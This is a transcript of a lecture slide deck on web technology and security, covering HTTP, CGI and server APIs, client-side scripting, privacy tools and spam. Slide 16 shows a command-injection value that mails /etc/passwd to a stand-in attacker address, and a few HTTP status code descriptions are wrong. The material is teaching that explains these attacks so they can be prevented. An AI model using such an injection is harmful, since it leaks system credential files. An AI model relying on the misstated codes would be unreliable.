World Wide Web Technology - PowerPoint PPT Presentation

About This Presentation
Title:

World Wide Web Technology

Description:

This gives the false impression the message has not been tampered with. ... addresses on Web-sites, Netnews postings, mailing list archives, message boards. ... – PowerPoint PPT presentation

Number of Views:409
Avg rating:3.0/5.0
Slides: 58
Provided by: PaulD109
Category:
Tags: technology | web | wide | world

less

Transcript and Presenter's Notes

Title: World Wide Web Technology


1
World Wide Web Technology
  • Request-response paradigm

2
HTTP HyperText Transfer Protocol
  • HTTP is a typical TCP/IP protocol
  • Textual representation both requests and
    responses have a textual representation so that a
    human can diagnose the protocol.
  • Standard error codes Internet convention says
  • 1xx command received and being processed
  • 2xx success
  • 3xx further action is needed
  • 4xx temporary error
  • 5xx permanent error
  • (HTTP has some slight deviations, see later)

3
HTTP Example
  • HTTP 1.0 request
  • GET /index.html HTTP/1.0
  • From debra_at_win.tue.nl
  • User-Agent Mozilla 4.74...
  • Accept text/plain
  • Accept text/html
  • ... other fields ...
  • lt empty line marks end of request gt

4
HTTP Example (cont.)
  • HTTP 1.0 reply
  • HTTP/1.0 200 OK
  • Date Mon, 08 Aug 2000 204851 GMT
  • Server Apache/1.3.4
  • Last-Modified Wed, 23 Sep 1999 ...
  • Content-Length 3173
  • Accept-Ranges bytes
  • Connection close
  • Content-Type text/html
  • lt empty line gt
  • lt The content of the document followsgt

5
HTTP Response Codes
  • 1xx request received, processing continues.
    (Such response is followed by another one.)
  • 2xx success, result depends on the code
  • 200 OK, result follows.
  • 201 An entity was created as a result of the
    request.
  • 3xx further processing needed
  • 300 Multiple choices, client must select one.
  • 301 Moved temporarily.
  • 304 Not modified (since date given in request).

6
HTTP Response Codes
  • 4xx client error
  • 400 Malformed request.
  • 401 Unauthorized, authorization required.
  • 402 Payment required (not yet supported).
  • 403 Forbidden, authorization will not help.
  • 404 Not found. (Resource temporarily or
    permanently unavailable.)
  • 5xx server error
  • 500 Internal server error (unexpected by
    server).
  • 503 Service unavailable (due to overload, )
  • see RFC 2068

7
HTTP Threats from result codes
  • HTTP is very susceptible to man in the middle
    attacks. Examples
  • 200 Since HTTP uses cleartext, the content of a
    document can be subtly altered. (The
    Content-Length must be kept correct though!)
  • 301 A browser can be fooled into loading from a
    different server, without the user knowing it.
  • 401 A user can be tricked into giving his
    password. Basic authentication transmits the
    password without encryption. (The newer digest
    authentication performs encryption.)

8
HTTP Basics
  • HTTP/1.0 uses a TCP/IP connection for each
    request.
  • HTTP/1.0 wastes resources because opening and
    closing connections is expensive.
  • Subsequent requests to the same server seem to
    form a session, but because they are separate
    TCP/IP connections the (non-existent) session can
    easily be broken into.
  • Browsers (Netscape Navigator, Internet Explorer,
    ...) issue several requests in parallel to
    retrieve in-line images faster. This actually
    constitutes a denial of service attack.

9
HTTP Basics
  • HTTP/1.1 solves some 1.0 problems
  • Support for multi-part content, meaning that only
    one request is needed to retrieve several objects
    at once.
  • Persistent connections reduce the risk of
    break-ins into a session, and reduce connection
    setup overhead. (Persistent connections may also
    cause a server to need many more open
    connections.)
  • Authentication can be done through a challenge
    mechanism and digest authentication. A user
    password is not transmitted over the network.

10
HTTP Security Issues
  • HTTP allows content-coding. Unfortunately, only
    compression schemes are defined, and no
    encryption schemes.
  • Secure-HTTP (or S-HTTP) is an extension with
    encryption, but not well supported. It encrypts
    the message (and reply) body but some of the
    header info is not encrypted.
  • HTTPS (HTTP over SSL) first creates an encrypted
    channel (using SSL). Subsequently request and
    reply headers and body are encrypted.

11
HTTP Security Issues (cont.)
  • Experimental implementations of persistent
    connections in HTTP 1.0 cause denial of service.
    Therefore HTTP 1.1 proxy servers never open a
    persistent connection with an HTTP 1.0 client.
  • HTTP 1.1 connections may time out. Both clients
    and servers must always be able to recover from
    asynchronous close events.
  • Browsers can route requests through a proxy. Some
    Internet Providers use a transparent proxy the
    user may not be aware of the proxys existence.

12
HTTP Security Issues (cont.)
  • Safe methods GET and HEAD should not take an
    action other than retrieval. (Users cannot be
    held accountable for side effects of these
    methods.)
  • Forms which are used with the GET method should
    never ask for sensitive information, because of
    logging attacks.
  • The Content-MD5 header can be used to add a
    digest (checksum) to a reply. This gives the
    false impression the message has not been
    tampered with.

13
HTTP Security Issues (cont.)
  • The behavior of a cache with authorized requests
    is not always safe a cache may return replies to
    non-authenticated clients.
  • Sharing browser sessions on shared workstations
    poses the risk of authorized sessions to be taken
    over by the next user.
  • A server may attempt to validate the identity of
    the user through the RFC 931 protocol. The
    users machine confirms the user name of an open
    connection. This technique is generally unsafe.

14
Server-side Technology
  • Basic architecture CGI scripts act as a gateway
    between WWW server and information system
    (database system).

15
Server-side Technology
  • Security threats from CGI-scripts
  • The input for a CGI-script results from filling
    out a form. The script should anticipate
    erroneous input, possibly also data overrun.
  • A CGI-script should check that it is invoked
    through the right form, by checking the
    HTTP_REFERER field. However, this field can be
    faked.
  • CGI-scripts are often written in scripting
    languages such as Perl or Bourne-shell. Writing
    scripts in such languages is easy, but writing
    secure scripts is difficult.

16
Server-side Technology
  • Example (part of) insecure shell script
  • echo message sendmail mail_to
  • (message and mail_to are form fields)
  • if the user enters into the mail_to field
  • nobody_at_nowhere.commail badguys_at_hell.orglt/etc
    /passwd
  • this results in the password file being sent to
    badguys_at_hell.org
  • Moral do not use environment variables (that
    are set through forms) without quoting and
    without checking them.

17
Server-side Technology
  • CGI-scripts can also be abused for denial of
    service attacks
  • An HTTP POST (or PUT) request can contain an
    arbitrary amount of input data. This may cause
    several problems
  • Intermediate proxies may crash.
  • The CGI-script may crash.
  • The CGI-script may need a lot of memory to handle
    the request.
  • A Web-server can be bombarded with (small)
    requests for CGI-scripts. The overhead can
    easily overload the Web-server.

18
Server-side Technology
  • Netscape NSAPI
  • In the handling of a request code can be added to
    the server in different places Init, AuthTrans,
    NameTrans, PathCheck, ObjectType, Service, Error
    and AddLog.
  • Errors in the user-added functions may cause the
    server to crash.
  • http//developer.netscape.com/docs/manuals/
    enterprise/nsapi/index.htm
  • Netscape WAI (Web Application Interface)
  • Newer API to write application wrappers, again
    through a server plug-in.

19
Server-side Technology
  • Microsoft IIS ISAPI
  • Similar to NSAPI, with the same problem code
    added to the server may cause the server to
    crash.
  • Microsoft IIS ASP (Active Server Pages)
  • Server-side scripting, in VBscript or Jscript, to
    create dynamic Web content and connections with
    databases. (Uses an ISAPI plugin itself.)
  • Microsoft IIS IDC (Internet Database Connector)
  • Extended HTML written in .htx files
  • Database scripts written in .idc files (easy to
    create through Frontpage editor)

20
Server-side Technology
  • Servlets Java equivalent to NSAPI or ISAPI
  • User-written code is added to the (running)
    server.
  • The Java environment ensures that errors in the
    code cannot cause a server crash.
  • The servlet API includes facilities for
    maintaining session information.
  • Servlets are a server-independent technology.
    Many Web-servers support Java servlets.

21
Client-side Technology
  • Apart from displaying HTML pages, a modern
    Web-browser can perform many other tasks
  • Invoking external programs
  • User-interaction through forms
  • Preserving state using cookies
  • Executing scripting code
  • Extension of browser with plug-ins
  • Execution of Java applets (plain or signed)
  • Execution of ActiveX controls (Windows only).

22
Client-side Technology
  • Invoking external programs
  • The HTTP reply contains a MIME-type depending on
    the MIME-type the browser will
  • Display the information (e.g. for HTML, GIF,
    JPG).
  • Use a plug-in to handle the information (see
    later).
  • Invoke an external program to handle the
    information.
  • The external program must already be installed on
    the client machine.
  • The user defines which MIME-type corresponds to
    which program.
  • The user must be careful to not allow information
    to be stolen or overwritten (un)intentionally.

23
Client-side Technology
  • User-interaction through forms
  • Many Web-sites offer seemingly interesting
    information only after the user fills out a form,
    which sends potentially sensitive information
    about the user to the Web-site.
  • Form input is sent to the server as cleartext.
    The browser can warn the user about it, but most
    users disable the warnings.
  • Modern browsers support form-based file upload.
    Users can be tricked to upload files with
    sensitive data.
  • Beware of forms combined with scripting.

24
Client-side Technology
  • Preserving state info through Cookies
  • A server orders a browser to store info using a
    Set-Cookie field in an HTTP reply. (One reply may
    contain several Set-Cookie requests.)
  • The browser returns cookies using the Cookie
    field in an HTTP request.
  • Cookies (with valid associated path names) are
    shared between servers that share part of the
    domain name 2 periods for .com, .edu, etc. and 3
    periods for .us, .nl, .uk, .be, etc.
  • Cookies are limited to 4Kbyte each, 20 Cookies
    per domain, 300 Cookies total.
  • http//www.netscape.com/newsref/std/cookie_spec.ht
    ml

25
Client-side Technology
  • Javascript and VBscript
  • Scripting languages (Javascript from Netscape and
    VBscript from Microsoft) make Web-pages active
    and/or interactive.
  • Actions can be triggered by user input (like
    button clicks, filling out a text field, etc.),
    by window operations (like close) and by
    time-outs.
  • Scripting languages are used to
  • Render the users workstation useless.
  • Lure the user into typing in or uploading
    sensitive information.
  • Lure users to the wrong Web-sites.

26
Client-side Technology
  • Denial of service attacks using scripting
  • Scripting languages are interpreted, which means
    execution is slow. A long (or infinite) may
    consume a large percentage of the available
    cpu-time.
  • A simple script may loop through a large array,
    thus consuming a lot of memory and hence
    resulting in thrashing.
  • A script may create extra windows upon being
    (un)loaded. It may re-open the window each time
    it is minimized or closed. A script may make it
    very difficult to get rid of such a window.

27
Client-side Technology
  • Obtaining sensitive information through scripts
  • There are numerous ways to lure users into typing
    in what one wants them to type using forms alone.
  • Scripting adds the possibility to open a popup
    window prompting for information.
  • A script can also make suggestions in the message
    area (bottom of browser window).
  • A script can change a file upload field before
    doing the upload.

28
Client-side Technology
  • Danger of powerful scripting language
    unrestricted simultaneous access to local
    resources and the network
  • A (VB)script can read, write, create and delete
    arbitrary files (for which the user has access
    rights).
  • A script can perform complicated calculations and
    manipulations because it is a general-purpose
    programming language.
  • The mail-part of Internet Explorer can be
    configured to automatically invoke scripts
    without requiring a click.

29
Client-side Technology
  • Tricking the clicks
  • A browser normally displays the destination of a
    link in the message area. A script can write a
    message by handling the mouseover event. This
    message may suggest a different link destination.
  • Some sites are paid for through advertisements.
    Some advertisers want to see hits on their site.
    Scripts can be used to simulate (but really
    generate) hits to sites without the user actually
    clicking on anything.

30
Client-side Technology
  • Extending the browser with plug-ins
  • Plug-ins are modules in machine code that are
    intended for enabling a browser to display some
    media type in-line.
  • A plug-in must be installed by the user on the
    client machine. Users should be very suspicious
    about plug-ins but most users are not.
  • A plug-in can perform all operations a separate
    executable can, including uploading arbitrary
    files, installing viruses, modifying or deleting
    arbitrary files, crashing the browser, maybe even
    rebooting the operating system, etc.

31
Client-side Technology
  • Java applets safe interactive components? Java
    applets are executed within a shielded
    environment (called sandbox)
  • Applets cannot read or write files.
  • Applets can only open IP connections to their
    origin site.
  • The Java runtime environment can perform a
    limited integrity check on applets.
  • When an applet performs an illegal operation the
    Java runtime environment catches it an generates
    an appropriate error message.

32
Client-side Technology
  • Java applets safe interactive components?
  • Applets can call methods of other applets that
    are included in the same HTML file. (They cannot
    find out about applets in other files.)
  • Applets in different frames (or files) can
    communicate through static fields.
  • Applets are stopped when the enclosing Web-page
    is being unloaded (replaced by a new page).
  • Stopped applets (not on displayed pages) may be
    destroyed and garbage collected.
  • Resource consumption by active applets may render
    the users workstation unusable.

33
Client-side Technology
  • ActiveX Distributed Components
  • ActiveX uses code signing. The supplier of an
    ActiveX control must provide a certificate
    (obtained from a trusted third party).
  • The browser displays an authenticode dialog box
    asking the user to accept the ActiveX control.
  • An accepted ActiveX control is a machine code
    module downloaded from a remote site. It can
    perform all actions that a separate program can
    execute (uploading, crashing, formatting hard
    disk, etc.)
  • See also http//www.byte.com/art/9709/sec5/sec5.h
    tm

34
Database Sessions on the Web
  • Database transactions consist of several steps.
    When accessing a database through the Web each
    step takes a separate HTTP request.
  • The requests need to be tied to the appropriate
    session (or transaction).
  • The session must not be broken into (even though
    each request is separate).
  • The system needs to be able to handle long-lived
    transactions but also be able to timeout when a
    session is inactive for a long time.

35
Database Sessions on the Web
  • Logging on to a Database through WWW
  • Logging on can be done through a form that
    requests for a username and password. The
    password will not encrypted in the request.
  • The server can return a code 401 on the first
    database request. The browser will prompt for a
    username and password. With basic authentication
    the password will not be encrypted. With digest
    authentication it will.
  • The browser will authenticate each subsequent
    request. The user must ensure to exit the
    browser after completing the database session.

36
Database Sessions on the Web
  • Once a session is created the browser must be
    able to refer to it in each request.
  • The session id can be kept in a hidden field in
    the form on each page.
  • The session id can be passed as part of the URL
    of each page.
  • The session id can be passed through Cookies.
    (Cookies are set through an HTTP reply and are
    stored on the client computer. They are sent
    back by the client on each subsequent request.)

37
Database Sessions on the Web
  • Dealing with long-lived transactions
  • When most transactions wish to succeed (e.g.
    customers want to buy items) one should use
    pessimistic concurrency control. Items are
    locked while they are in the customers shopping
    cart.
  • When most transactions are deliberately aborted
    (e.g. customers put back items or leave the
    store, leaving their cart behind) one should use
    optimistic concurrency control. Items are not
    locked while in the customers shopping cart and
    may not be available at the cash register.

38
Database Connections through Java
  • Java applets can be used to keep a connection to
    a database (or gateway) open.
  • JDBC-ODBC bridge works with many database
    systems.
  • Native-API partly-Java driver requires specific
    client API (for Oracle, Sybase, )
  • Net-protocol All-Java driver protocol between
    browser and server is vendor independent.
  • Native-protocol All-Java driver converts JDBC
    calls to network protocol for specific DBMS.
    There are 2-tier and 3-tier configurations.

39
Database Connections through Java
  • JDBC-ODBC bridge

40
Database Connections through Java
  • Native-API Partly-Java driver

41
Database Connections through Java
  • Net-protocol All-Java driver

42
Database Connections through Java
  • Native-Protocol All-java driver, 2-tier

43
Database Connections through Java
  • Native-Protocol All-Java driver, 3-tier

44
Database Connections through Java
  • Native-Protocol All-Java driver, 3-tier

45
Privacy on the Web
  • The Web is not as anonymous as it looks
  • The users IP number, browser, operating system
    and other aspects may be detected. Cookies may
    provide additional information about the user.
  • Different Web-sites may collaborate in gathering
    data about users by combining their logging
    activities.
  • ISPs may log Web access distribution and provide
    access patterns and hit rates to Web-sites.
  • Users may sometimes want to be known (e.g. to buy
    and pay something) and sometimes want to be
    anonymous.

46
Privacy on the Web
  • The Anonymizer
  • Functions as a kind of proxy server.
  • Accesses appear to originate from the anonymizer
    site instead of the users IP number.
  • All user-related data is removed from a request.
  • Users are not anonymous to the anonymizer. (And
    the anonymizer may be legally forced to reveal a
    users accesses.)
  • Users are not anonymous to their ISP either.
  • See http//www.anonymizer.com/

47
Privacy on the Web
  • Crowds anonymously hiding in a crowd.
  • Each user activates a jondo jondos communicate
    with each other.
  • Each HTTP request is forwarded to another
    randomly chosen jondo.
  • Each received request is either forwarded to
    another jondo or passed onto the destination
    server.
  • The random routing is very safe (not traceable,
    and no single point of failure) but may be slow.
  • Crowds cannot really include members that are
    behind firewalls.

48
Privacy on the Web
  • Onion Routing anonymity through encrypted
    messages and routing through a network of
    Mixes.
  • An onion (on the client machine) determines a
    path through the network. It uses a recursively
    layered data structure using keys of all routers
    on the path.
  • Each router can decrypt the onion to find out the
    address of the next router (but not the message
    or the rest of the path).
  • There is no single point of failure.

49
Privacy on the Web
  • LPWA Lucent Personalized Web Assistant
  • Acts as a proxy server.
  • Creates a different alias for a user for each
    Web-site. (So collaborating Web-sites cannot
    detect a common user.)
  • Creates a different fake (but also real) email
    address.
  • Includes anti-spamming support by allowing to
    block certain fake email addresses (to which spam
    is being sent).
  • Has a single point of failure.

50
Anonymous E-mail (or Netnews)
  • Pseudo-anonymous remailers
  • The user registers with a remailer. The remailer
    creates an alias (email address on his site).
    Mail from the user is forwarded as if it came
    from the alias. Mail to the alias is forwarded
    back to the user.
  • Mail is delayed for a random period of time, so
    that there is no correlation between the time
    mail arrives at the remailer and the time it
    leaves the remailer.
  • A trustworthy remailer will support PGP.

51
Anonymous E-mail (or Netnews)
  • True anonymous remailers
  • Cypherpunk remailers
  • Messages are encrypted recursively several times.
  • Each remailer strips off one layer.
  • Mixmaster remailers
  • Messages contain 20 encrypted headers.
  • Each remailer adds its header to the back of the
    list, so the number of headers remains 20. (No
    remailer knows how many hops there are before or
    after itself, except for the last one who knows
    it must perform delivery.)
  • Nice intro to Cypherpunk and Mixmaster at
  • http//www.obscura.com/loki/remailer/remailer-ess
    ay.html

52
SPAM
  • SPAM is a collection of forms of email abuse,
    including
  • Trying to sell you something you dont want.
  • Pyramid scams.
  • Chain letters.
  • Junk mail faked to look like it accidentally got
    to you but was for someone else.
  • Requests for permission to send you commercial
    email.
  • Unwanted announcements of events.

53
SPAM
  • How to recognize SPAM?
  • Subject or content often speaks for itself.
  • Sender is a numbered/free email account.
  • Message asks to reply if you wish to no longer
    receive mail from this sender or list.
  • Sender looks like a fake address.
  • Sender looks like a real address but clearly an
    address from where this kind of message would not
    have been sent.

54
SPAM
  • Why do you receive SPAM?
  • There are robots or spiders searching for
    email addresses on Web-sites, Netnews postings,
    mailing list archives, message boards.
  • Organizations sell databases with millions of
    email addresses they gathered. (They use SPAM to
    advertise their databases)
  • If you have never announced your email address
    anywhere, someone else may have done it, e.g. to
    tell people in a newsgroup that you are
    knowledgeable in some subject area.

55
SPAM
  • How to avoid SPAM?
  • The chances to completely avoid SPAM are small
    when you use the Web, Netnews, etc.
  • Never write your email address.
  • Transform your email address in a way which is
    obvious enough for humans but too difficult for
    mail-address-searching robots. (e.g. use
    NOyournameSPAM_at_NOTmysite.myorg.com)
  • Do not explain how to obtain your email address
    from the distorted one.
  • Never reply to a SPAM message!

56
SPAM
  • How to filter out SPAM?
  • Block mail from sites which are known for
    spamming (some free email sites are often
    blocked, including hotmail.com, freemail.nl).
  • Block mail from usernames with numbers in them.
  • Delete mail with a combination of certain words
    or expressions in them (like get rich or make
    in days).
  • Verify that the senders domain exists.

57
SPAM
  • What to do and what not to do
  • Do not send an email bomb to the sender, because
    in 99 of the cases the sender address was faked.
  • Send a friendly message to the postmaster or
    abuse of the senders site, to warn him that
    the sites name is being abused. (Do not assume
    the site is the origin of the SPAM.)
  • Notify your ISP, who may try to trace back the
    real origin of the message.
  • If the messages announces dubious services with
    phone numbers, notify the phone company.
Write a Comment
User Comments (0)
About PowerShow.com